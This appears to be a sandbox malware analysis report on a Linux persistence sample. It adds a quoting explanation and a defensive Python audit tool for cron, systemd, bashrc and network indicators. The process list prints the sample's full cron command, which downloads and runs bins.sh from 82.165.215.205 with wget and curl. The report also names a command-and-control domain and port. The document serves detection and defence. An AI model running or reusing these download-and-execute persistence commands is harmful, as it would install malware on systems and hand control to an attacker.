Malware Analysis Report

2025-08-05 17:00

Sample ID 240108-d89dtabee4
Target ccdcabc06ed12d315440fabad4c0e7a9.bin
SHA256 2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661
Tags: persistence
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 7/10
SHA256: 2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661

Threat level: shows suspicious behavior.

The file ccdcabc06ed12d315440fabad4c0e7a9.bin was classified as showing suspicious behavior (score 7/10). No malware family is named in this report; the only tag applied is persistence, based on the cron, systemd and shell-startup modifications listed below.

Malicious Activity Summary (tag: persistence)

    Changes its process name
    Modifies Watchdog functionality
    Creates/modifies Cron job
    Creates/modifies environment variables
    Enumerates active TCP sockets
    Enumerates running processes
    Modifies systemd
    Modifies Bash startup script
    Reads system network configuration
    Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-01-08 03:41

Signatures: N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-01-08 03:41
Reported: 2024-01-08 03:44
Platform: ubuntu1804-amd64-20231215-en
Max time kernel: 141s
Max time network: 154s

Command Line

[/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]

Signatures

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | /bin/busybox | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A

Modifies Watchdog functionality

Description | Indicator | Process | Target
File opened for modification | /dev/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A
File opened for modification | /dev/misc/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A

Creates/modifies Cron job (tag: persistence)

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.uIfVKk | /usr/bin/crontab | N/A

Creates/modifies environment variables (tag: persistence)

Description | Indicator | Process | Target
File opened for modification | /root/.bashrc | N/A | N/A

Enumerates active TCP sockets

Description | Indicator | Process | Target
File opened for reading | /proc/net/tcp | N/A | N/A

Enumerates running processes

No indicator rows are listed for this signature; it is derived from the per-process /proc/<pid>/stat, /proc/<pid>/cmdline and /proc/<pid>/fd reads recorded under "Reads runtime system information" below.

Modifies systemd (tag: persistence)

Description | Indicator | Process | Target
File opened for modification | /lib/systemd/system/bot.service | N/A | N/A

Modifies Bash startup script (tag: persistence)

Description | Indicator | Process | Target
File opened for modification | /root/.bashrc | N/A | N/A

Reads system network configuration

Description | Indicator | Process | Target
File opened for reading | /proc/net/tcp | N/A | N/A

Reads runtime system information

All rows are "File opened for reading", process N/A, target N/A. The 64 indicators are /proc entries of other processes, grouped here by file and sorted by PID; the sample walks /proc and reads the stat, cmdline and fd entries of the processes it finds.

/proc/<pid>/fd (24 PIDs): 2, 10, 11, 17, 26, 28, 30, 36, 78, 82, 83, 162, 164, 532, 638, 1120, 1124, 1141, 1255, 1290, 1328, 1460, 1527, 1547

/proc/<pid>/stat (25 PIDs): 14, 24, 27, 34, 84, 154, 156, 160, 163, 170, 171, 265, 454, 662, 947, 1065, 1112, 1136, 1164, 1519, 1520, 1529, 1539, 1556, 1557

/proc/<pid>/cmdline (15 PIDs): 9, 34, 79, 168, 254, 332, 460, 711, 952, 1088, 1111, 1141, 1190, 1520, 1552

Processes

Each entry is the process image followed by its recorded command line.

/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
    [/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]
/bin/sh
    [sh -c (crontab -l ; echo "@reboot /bin/bash -c "/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh"") | crontab -]
/usr/bin/crontab
    [crontab -l]
/usr/bin/crontab
    [crontab -]
/bin/chmod
    [chmod +x bins.sh]
/bin/sh
    [sh bins.sh]
/bin/curl
    [/bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh]
/bin/chmod
    [chmod +x bins.sh]
/bin/sh
    [sh bins.sh]
/bin/sh
    [sh -c /bin/systemctl enable bot]
/bin/systemctl
    [/bin/systemctl enable bot]

Note on the cron command line. The double quote that follows `/bin/bash -c ` closes the argument to `echo`, so the text that is piped into `crontab -` is the existing crontab plus a single line, `@reboot /bin/bash -c /bin/wget http://82.165.215.205/bins/bins.sh` (plus whatever the immediately executed commands write to stdout). Everything after the first `;` is not part of the echoed string: `chmod +x bins.sh`, `sh bins.sh`, `/bin/curl ...`, `chmod +x bins.sh` and `sh bins.sh` run right away in the `sh -c` shell. That is exactly the sequence of child processes recorded above (chmod, sh, curl, chmod, sh), and it explains why no wget process appears: `/bin/wget` only ever exists as text inside the cron entry. The final `systemctl enable bot` enables the /lib/systemd/system/bot.service unit written under Files, giving the sample a second, independent persistence path.
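The quoting behaviour described above can be reproduced without running anything harmful. The block below is an added example, not part of the sandbox report: it feeds a constructed stand-in with the same quoting shape to `sh -c`, with the existing crontab simulated by one benign entry, the download URL replaced by a placeholder (`http://example.invalid/bins.sh`), and each trailing command replaced by an `echo` to stderr. Stdout is what `crontab -` would have received; stderr lists the commands that executed immediately instead of being scheduled.

```python
import subprocess

# Constructed stand-in with the same quoting shape as the sample's command line.
# Compared with the real one: the `crontab -l` output is simulated by a single
# harmless entry, the URL is a placeholder, and the trailing payload commands
# (chmod / sh / curl in the sample) are replaced by `>&2 echo ...` markers.
DEMO = (
    '(echo "0 3 * * * /usr/bin/certbot renew" ; '
    'echo "@reboot /bin/bash -c "/bin/wget http://example.invalid/bins.sh; '
    '>&2 echo RAN:chmod; >&2 echo RAN:sh"")'
)


def cron_payload_demo() -> tuple[list[str], list[str]]:
    """Run DEMO under /bin/sh and return two lists:
    - the lines that reach stdout, i.e. what `| crontab -` would install;
    - the stderr markers of the commands that ran immediately."""
    proc = subprocess.run(["sh", "-c", DEMO], capture_output=True, text=True, check=True)
    return proc.stdout.splitlines(), proc.stderr.splitlines()


if __name__ == "__main__":
    installed, ran = cron_payload_demo()
    print("would be installed by `crontab -`:")
    for line in installed:
        print("   ", line)
    print("executed immediately instead:")
    for line in ran:
        print("   ", line)
```

The second stdout line stops right after the URL, because the quote after `-c ` terminated the `echo` argument; the `RAN:*` markers on stderr correspond to the chmod/sh/curl children in the process list, and nothing corresponding to wget ever runs.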

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | | udp
US | 151.101.2.49:443 | | tcp
US | 151.101.1.91:443 | | tcp
GB | 89.187.167.3:443 | | tcp
US | 1.1.1.1:53 | apple.bbos.ink | udp
LT | 176.223.133.62:1290 | apple.bbos.ink | tcp
GB | 185.125.188.62:443 | | tcp
GB | 185.125.188.61:443 | | tcp

The only destination with an associated domain is apple.bbos.ink: it was resolved through 1.1.1.1 and the sample then connected to 176.223.133.62 on TCP port 1290, which is the connection most relevant to the sample itself. No traffic to 82.165.215.205, the download host in the cron command and the curl process, appears in this capture, so the bins.sh second stage was not retrieved during detonation. The remaining TCP 443 destinations and the mDNS multicast traffic carry no domain in the report and should be checked against the sandbox's own baseline before being treated as sample-related.

Files

/var/spool/cron/crontabs/tmp.uIfVKk

MD5 2f16a50a03b078ad9d67f3835641e9fd
SHA1 8317001974fe8b4806e2377f4e62f9c74d588388
SHA256 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f
SHA512 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85

/lib/systemd/system/bot.service

MD5 d77308e381db6ea7245af6f3b7be118e
SHA1 0a0f20a03f4db351a404954c780eebd15b3775bb
SHA256 feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b
SHA512 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4
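The signatures and files in this report give a defender three host-side persistence artifacts to look for (an `@reboot` crontab entry that fetches a script, a `bot.service` systemd unit, a launcher line added to /root/.bashrc) and one network indicator (apple.bbos.ink / 176.223.133.62:1290). The block below is an added example, not part of the report or of any sandbox product: it implements those checks as small audit functions over text you would collect with `crontab -l`, by reading /lib/systemd/system/*.service, by reading ~/.bashrc, and from a connection table. The only values taken from the report are the indicator IPs, the domain and the unit name; every sample input is constructed, including the contents of bot.service, which the report does not reproduce. The generic rules (downloader in a scheduled task, Exec line under /tmp, network fetch in a shell startup file) apply beyond this sample.

```python
import re
from dataclasses import dataclass

# Indicators taken from the report above.
IOC_IPS = {"82.165.215.205", "176.223.133.62"}
IOC_DOMAINS = {"apple.bbos.ink"}
IOC_UNIT_NAMES = {"bot.service"}

# Generic heuristics that do not depend on this particular sample.
DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")
RAW_IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
EXEC_KEYS = ("ExecStart", "ExecStartPre", "ExecStartPost")


@dataclass(frozen=True)
class Finding:
    source: str    # which artifact produced the hit
    rule: str      # short rule name
    evidence: str  # offending line or value


def audit_crontab(text: str, source: str = "crontab") -> list[Finding]:
    """Flag @reboot entries, downloader calls and known-bad hosts in `crontab -l` output."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@reboot"):
            hits.append(Finding(source, "cron_reboot_entry", line))
        if DOWNLOADER_RE.search(line):
            hits.append(Finding(source, "cron_downloader", line))
        m = RAW_IP_URL_RE.search(line)
        if m and m.group(1) in IOC_IPS:
            hits.append(Finding(source, "cron_ioc_host", m.group(1)))
    return hits


def audit_unit(name: str, text: str, source: str = "systemd") -> list[Finding]:
    """Flag a unit by known-bad name and by Exec* lines that run from a scratch dir or fetch code."""
    hits = []
    if name in IOC_UNIT_NAMES:
        hits.append(Finding(source, "unit_ioc_name", name))
    for raw in text.splitlines():
        key, sep, value = raw.partition("=")
        if not sep or key.strip() not in EXEC_KEYS:
            continue
        value = value.strip()
        if any(d in value for d in SCRATCH_DIRS):
            hits.append(Finding(source, "unit_exec_from_scratch_dir", f"{name}: {value}"))
        if DOWNLOADER_RE.search(value):
            hits.append(Finding(source, "unit_downloader", f"{name}: {value}"))
    return hits


def audit_bashrc(text: str, source: str = "/root/.bashrc") -> list[Finding]:
    """Flag shell-startup lines that launch from a scratch dir or fetch from the network."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOADER_RE.search(line) or any(d in line for d in SCRATCH_DIRS):
            hits.append(Finding(source, "bashrc_launcher", line))
    return hits


def audit_connections(conns, source: str = "connections") -> list[Finding]:
    """conns: iterable of (dst_ip, dst_port, resolved_domain_or_None)."""
    hits = []
    for dst_ip, dst_port, domain in conns:
        if dst_ip in IOC_IPS or domain in IOC_DOMAINS:
            hits.append(Finding(source, "ioc_connection", f"{domain or dst_ip}:{dst_port}"))
    return hits


# Constructed sample inputs (not captured from the sandbox). The unit body is
# a guess at what bot.service could contain; the report does not show it.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /bin/bash -c /bin/wget http://82.165.215.205/bins/bins.sh
"""
SAMPLE_UNIT = """[Unit]
Description=bot

[Service]
ExecStart=/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
Restart=always

[Install]
WantedBy=multi-user.target
"""
SAMPLE_BASHRC = """# ~/.bashrc
alias ll='ls -alF'
/bin/sh /tmp/bins.sh >/dev/null 2>&1 &
"""
SAMPLE_CONNS = [
    ("185.125.188.62", 443, None),
    ("1.1.1.1", 53, None),
    ("176.223.133.62", 1290, "apple.bbos.ink"),
]


def run_audit() -> list[Finding]:
    return (audit_crontab(SAMPLE_CRONTAB) + audit_unit("bot.service", SAMPLE_UNIT)
            + audit_bashrc(SAMPLE_BASHRC) + audit_connections(SAMPLE_CONNS))


if __name__ == "__main__":
    for f in run_audit():
        print(f"{f.source:12} {f.rule:28} {f.evidence}")
```

On a real host, feed `audit_crontab` the output of `crontab -l` for root and every other user (and the files under /etc/cron.d), call `audit_unit` once per file in /lib/systemd/system and /etc/systemd/system, and build the connection list from `ss -tnp` plus your DNS logs; the rules are deliberately broad, so review hits rather than acting on them automatically.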